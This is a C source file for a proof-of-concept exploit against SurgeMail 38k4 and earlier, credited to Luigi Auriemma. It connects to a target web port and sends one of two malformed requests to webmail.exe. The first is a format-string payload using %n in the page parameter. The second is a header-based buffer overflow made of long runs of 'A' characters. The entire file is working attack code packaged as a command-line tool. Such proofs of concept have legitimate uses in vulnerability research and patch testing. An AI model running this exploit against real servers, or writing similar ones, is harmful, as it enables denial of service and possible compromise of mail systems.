/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        80
#define BUFFSZ      0x7fff



int putss(u8 *dst, u8 *src);
int putcc(u8 *dst, int chr, int len);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            i,
            attack;
    u16     port    = PORT;
    u8      *buff,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "SurgeMail <= 38k4 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = format string in webmail.exe's page command\n"
            " 2 = buffer-overflow in the building of environment strings\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();

    p = buff;
    if(attack == 1) {
        p += putss(p,
            "GET /scripts/webmail.exe?page=%n%n%n%s%s%s%s HTTP/1.0\r\n"
            "\r\n");

    } else if(attack == 2) {
        p += putss(p, "GET /scripts/webmail.exe HTTP/1.0\r\n");
        for(i = 0; i < 25; i++) {
            p += sprintf(p, "%02d: ", i);
            p += putcc(p, 'A', 800);
            p += putss(p, "\r\n");
        }
        p += putss(p, "\r\n");

    } else {
        printf("\nError: wrong attack number\n");
        exit(1);
    }

    printf("- send malformed data\n");
    send(sd, buff, p - buff, 0);
    if(!timeout(sd, 3)) recv(sd, buff, BUFFSZ, 0);
    close(sd);

    printf("- done\n");
    free(buff);
    return(0);
}



int putss(u8 *dst, u8 *src) {
    int     len;

    len = strlen(src);
    memcpy(dst, src, len);
    return(len);
}



int putcc(u8 *dst, int chr, int len) {
    memset(dst, chr, len);
    return(len);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


